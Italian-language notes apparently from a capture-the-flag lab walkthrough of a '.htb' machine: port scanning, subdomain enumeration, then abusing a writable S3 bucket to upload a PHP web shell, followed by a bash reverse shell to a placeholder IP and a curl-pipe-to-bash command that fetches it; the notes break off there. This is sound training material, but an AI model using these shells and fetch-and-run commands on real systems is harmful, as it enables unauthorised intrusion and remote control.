IP: 10.129.185.230
-----

Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 04:27 EDT
Nmap scan report for 10.129.185.230
Host is up (0.046s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

esiste un server web e una connesione tramite SSH, provo a connetermi
--------

scorro all'interno dei sito e trovo un'email con un dominio @thetoppers.htb,
aggiungo il dominio al file /etc/hosts in modo da crearmi una hostname resolution per quel sito

echo "10.129.227.248 thetoppers.htb" | sudo tee -a /etc/hosts
------------

cerco eventuali subdomain ([word].thetoppers.htb) tramite gobuster passando una wordList 
gobuster vhost -w ../SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://thetoppers.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     ../SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/09/19 04:49:55 Starting gobuster in VHOST enumeration mode
===============================================================
Found: s3.thetoppers.htb (Status: 404) [Size: 21]
Found: gc._msdcs.thetoppers.htb (Status: 400) [Size: 306]
                                                         
===============================================================
2022/09/19 04:50:16 Finished
===============================================================

noto un sottodominio in particolare s3.thetoppers.htb, lo aggiungo al file /etc/hosts e ci navigo

echo "10.129.227.248 s3.thetoppers.htb" | sudo tee -a /etc/hosts
------------

visualizzo una pagina bianca con un messaggio JSON: {"status": "running"}

tramite una ricerca https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html vedo che si tratta di un AWS
bucket per lo storage di delle informazioni.
scopo in oltre che posso interagire con il servizio AWS s3 tramite la awscli
--------

list of all the S3 buckets hosted dal server

aws --endpoint=http://s3.thetoppers.htb s3 ls
2022-09-19 04:43:51 thetoppers.htb
-------

posso in oltre usare il comando ls per visualizzare una lista dei previssi nel bucket

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
                           PRE images/
2022-09-19 04:43:51          0 .htaccess
2022-09-19 04:43:51      11952 index.php

noto la presenza del file index.php come se questa fosse la root del sito
---------

awscli mi permette di caricare anche dei file e sapendo che il sito uitlizza php posso caricare una shell

creo il file di upload
echo '<?php system($_GET["cmd"]); ?>' > shell.php

lo invio al server
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

confermo che la shell è andata a buon fine navigando su http://thetoppers.htb/shell.php?cmd=X dove al posto di X
specifico un comando

http://thetoppers.htb/shell.php?cmd=ls mi restitusice le cartelle
------

procedo alla creazione della reverse shell
creo un file bash in cui specifico il seguente comando 
!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1
----
apro una porta in ascolto 

nc -lvnp 1337
listening on [any] 1337 ...
---
avvio un server python sulla porta 8000 e uso curl per inviare all'obiettivo la reverse shell

http://thetoppers.htb/shell.php?cmd=curl%20<YOUR_IP_ADDRESS>:8000/shell.sh|bash
----


